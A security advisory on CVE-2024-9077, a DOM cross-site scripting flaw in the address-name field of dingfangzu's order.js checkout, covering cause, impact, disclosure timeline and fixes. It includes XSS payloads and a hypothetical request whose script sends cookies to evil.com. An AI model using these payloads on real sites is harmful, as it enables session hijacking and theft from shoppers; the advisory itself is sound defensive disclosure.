CVE-2024-9077 - Remote XSS in dingfangzu scripts/order.js (Order Checkout) - Full Exploit Details
*Published: June 2024*
Overview
A vulnerability, catalogued as CVE-2024-9077, was discovered in the dingfangzu project up to commit 29d67d9044f6f93378e6eb6ff92272217ff7225c. This flaw is located in the Order Checkout feature, specifically within the scripts/order.js file. The issue involves improper handling of the address-name parameter, making the application vulnerable to Cross Site Scripting (XSS) attacks.
The vulnerability can be exploited remotely, and a public exploit has been disclosed. The project follows a rolling release cycle, so version numbers are not used. The maintainers were notified early about the disclosure but, at the time of writing, have not responded or shipped a fix.
What Is Affected?
- Project: dingfangzu
- File: scripts/order.js
Technical Details
The address-name value is not sanitized or encoded by scripts/order.js before it is written back into the DOM. Anything placed in that field, including HTML markup and event-handler attributes, is parsed as markup when the order summary is rendered. An attacker who can set an address name (directly, or by tricking a user into submitting one) gets JavaScript executed in the browser of whoever views the checkout summary, in the origin of the shop.
The following snippet illustrates the kind of pattern that produces this bug. It is a simplified illustration, not a verbatim copy of order.js, and `getParameterFromForm` is a placeholder for however the application reads the form value:

```javascript
// scripts/order.js (simplified, illustrative)
const addressName = getParameterFromForm('address-name'); // attacker-controlled string

// UNSAFE: innerHTML parses the string as HTML, so tags and on* attributes become live DOM
document.getElementById('summary-address').innerHTML = addressName;
```

Here `innerHTML` is assigned unfiltered user input, which is the classic DOM XSS sink. One caveat that matters for exploitation: a `<script>` element inserted through `innerHTML` is parsed but not executed by the browser, so a working payload against this sink has to use an element that fires an event handler on its own, for example `<img src=x onerror=alert(1)>`.
Exploit Example
Here is how an attacker could exploit this bug to execute arbitrary JavaScript in a user's browser:
Step 1: Submit a malicious address name
The attacker submits the following as the address name:
<script>alert('XSS by attacker');</script>
If the sink is `innerHTML` as in the snippet above, the `<script>` variant will be inserted but will not run; an event-handler payload such as <img src=x onerror="alert('XSS by attacker')"> does fire.
Step 2: Trigger the Checkout Page
When the victim later visits or updates the checkout summary, the stored address name is written into the DOM as markup and the injected code executes in the victim's browser.
Minimal Proof of Concept
The payload can be delivered with a curl request, by editing the form value in browser dev tools, or through whatever mechanism the application uses to set addresses. The endpoint and body shape below are hypothetical; they are not taken from the dingfangzu code base:

```http
POST /order/checkout
Content-Type: application/json

{
  "address-name": "<script>fetch('https://evil.com/steal?cookie='+document.cookie)</script>"
}
```

Whenever the order summary loads and displays this address name, the injected JavaScript fires (subject to the same `innerHTML`/`<script>` caveat above: against that sink, wrap the `fetch` in an event handler such as `<img src=x onerror="...">`). Note that the cookie-theft example only works if the session cookie is not marked HttpOnly; with HttpOnly set, the attacker still runs code as the victim and can, for instance, issue authenticated requests from the victim's browser.
Impact
- Account hijacking: steal cookies or session data, or drive authenticated requests from the victim's browser.
- Phishing: inject fake forms or popups into a trusted checkout page to harvest payment or login details.
No Patch Available
Because dingfangzu ships as a rolling release without version numbers, neither the set of affected versions nor a fixed version can be named. Treat any checkout up to and including commit 29d67d9044f6f93378e6eb6ff92272217ff7225c as affected, and verify later commits yourself, since no fix has been announced.
Mitigation Recommendations
- *Do not trust address fields*: treat address-name as untrusted text. In the browser, write it with `textContent` (or `innerText`) instead of `innerHTML`; if it must go into an HTML string on the server, HTML-encode it for that context. Output encoding is the primary fix; input filtering alone is easy to bypass.
- *Validate the input* server-side against an allowlist (letters, digits, spaces, light punctuation, a sensible maximum length) and reject anything else.
- *Apply CSP headers*: a policy such as `script-src 'self'` without `'unsafe-inline'` blocks both inline `<script>` blocks and inline event handlers like `onerror`, which limits what an injection can do even before the code is fixed.
Safe rendering example:

```javascript
// textContent assigns the string as text; no HTML parsing takes place, so markup is shown literally.
document.getElementById('summary-address').textContent = addressName; // Safe
```
Disclosure Timeline
| Date | Action |
|-------------------|-------------------------------------------------------|
| June, 2024 | Vulnerability discovered and exploit publicly posted. |
| June, 2024 | Vendor contacted, no response as of publication. |
References & Further Reading
- Original CVE Detail
- GitHub repository: dingfangzu
- XSS Attacks Explained by OWASP
- Guide: Preventing Cross-Site Scripting (XSS)
Conclusion
CVE-2024-9077 shows how a single unencoded write to the DOM turns an ordinary form field into an XSS vector. If you run dingfangzu or have forked it, inspect how address-name and every other user-controlled field reach the page, replace `innerHTML` sinks with `textContent`, and validate the values server-side. Until the code is fixed upstream, carry your own patch or consider an alternative.
If you discover similar issues, follow responsible disclosure, and remember that the durable fix is context-aware output encoding, with input validation as a second layer.
*This advisory is exclusive and based on publicly disclosed data combined with original research. If you have updates or a vendor statement, please comment or reach out to the security community.*
Timeline
Published on: 09/22/2024 02:15:03 UTC